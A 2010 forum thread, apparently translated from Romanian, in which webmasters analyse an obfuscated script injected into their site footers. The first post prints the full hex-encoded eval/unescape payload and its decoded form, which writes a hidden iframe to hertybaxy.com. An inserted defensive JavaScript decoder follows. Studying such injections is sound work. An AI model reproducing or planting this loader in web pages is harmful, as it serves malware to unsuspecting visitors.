paxnWo Posted April 21, 2010

Today I came across the 6th site this week that has this inserted in its footer:

<script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%75%45%75%2C%78%55%6F%2C%45%4E%62%56%2C%61%4C%2C%71%6D%2C%49%4A%29%7B%71%6D%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%49%4A%5B%45%4E%62%56%5D%3D%61%4C%5B%45%4E%62%56%5D%7C%7C%45%4E%62%56%3B%61%4C%3D%5B%66%75%6E%63%74%69%6F%6E%28%71%6D%29%7B%72%65%74%75%72%6E%20%49%4A%5B%71%6D%5D%7D%5D%3B%71%6D%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%45%4E%62%56%3D%31%7D%3B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%69%66%28%61%4C%5B%45%4E%62%56%5D%29%75%45%75%3D%75%45%75%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%71%6D%28%45%4E%62%56%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%61%4C%5B%45%4E%62%56%5D%29%3B%72%65%74%75%72%6E%20%75%45%75%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%68%65%72%74%79%62%61%78%79%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->

The sites have no connection to each other, except that they are all from Romania. All of them have the comment " uy7gdr5kmn ".
The hex above, decoded:

eval(function(uEu,xUo,ENbV,aL,qm,IJ){qm=String;if(!''.replace(/^/,String)){while(ENbV--)IJ[ENbV]=aL[ENbV]||ENbV;aL=[function(qm){return IJ[qm]}];qm=function(){return'\\w+'};ENbV=1};while(ENbV--)if(aL[ENbV])uEu=uEu.replace(new RegExp('\\b'+qm(ENbV)+'\\b','g'),aL[ENbV]);return uEu}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com||write|width|hertybaxy|document|http|src|iframe|height'.split('|'),0,{}))

An iframe to hertybaxy.com

Even an HTML file of mine was infected with this; it was the only one on the host, so it is out of the question that someone got access to it. Suspicious. Anyway, the authors are making a pile of money.
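The two decoding steps described in the post above can be done statically, without ever calling eval on the injected code. This is an added example, not part of the original thread: the function names are illustrative, the sample is constructed with the placeholder domain example.invalid, and only packer radixes up to 36 are handled.

```javascript
// Added example: static (no eval) decoding of the two layers described above.
// SAMPLE is constructed; example.invalid is a placeholder, not a real host.
const inner = String.raw`eval(function(p,a,c,k,e,d){/* body omitted */}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'invalid||write|width|example|document|http|src|iframe|height'.split('|'),0,{}))`;
const enc = [...inner].map((ch) => '%' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const SAMPLE = `<p>footer</p><script>eval(unescape('${enc}'));</script><!-- marker -->`;

// Layer 1: extract the %XX argument of eval(unescape('...')) and decode it as data.
function decodeUnescapeLayer(html) {
  const m = /eval\(unescape\('((?:%[0-9A-Fa-f]{2})+)'\)\)/.exec(html);
  if (!m) return null;
  return m[1].replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Layer 2: read payload, radix and dictionary from the packer call, then
// substitute tokens by hand instead of running the wrapper function.
function unpack(src) {
  const m = /\}\('((?:[^'\\]|\\.)*)',(\d+),\d+,'([^']*)'\.split\('\|'\)/.exec(src);
  if (!m) return null;
  const radix = Number(m[2]);
  if (radix < 2 || radix > 36) return null; // base-62 variants are not handled here
  const payload = m[1].replace(/\\(.)/g, '$1'); // undo string-literal escapes
  const words = m[3].split('|');
  return payload.replace(/\b\w+\b/g, (tok) => {
    const i = parseInt(tok, radix);
    // Replace only exact indices with a non-empty dictionary entry.
    return i.toString(radix) === tok && words[i] ? words[i] : tok;
  });
}

// Full pipeline: returns the unpacked script text and the iframe URL it writes.
function analyze(html) {
  const layer1 = decodeUnescapeLayer(html);
  const unpacked = layer1 ? unpack(layer1) : null;
  const m = unpacked ? /<iframe[^>]*\bsrc=\\?["']?([^"'\\\s>]+)/i.exec(unpacked) : null;
  return { unpacked, iframeSrc: m ? m[1] : null };
}

console.log(analyze(SAMPLE));
```

Run over every .html and .php file on a host, `analyze` returns a non-null `iframeSrc` for files carrying this kind of footer injection and null for clean ones.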
linux_terminal Posted April 21, 2010

It's interesting, because I also thought of a similar one; good thing it's harmless :)

Kaspersky detected it for me as: Trojan-Clicker.JS.Iframe.fc

And without antivirus:

Windows 7
C:\WINDOWS\system32\SEARCHPROTOCOLHOST.EXE

Edited April 22, 2010 by linux_terminal
Fitty Posted April 22, 2010

It happened to me too, on several hosts. But at least I don't get alarmed and I piss on them.

@linux_terminal: Windows user? ))
loki Posted April 22, 2010

These infect all the html and php files they find. You have to scan everything there. It happened to me at home once and later on awardspace, but there I didn't figure out how it got in; I had nothing that allowed writes.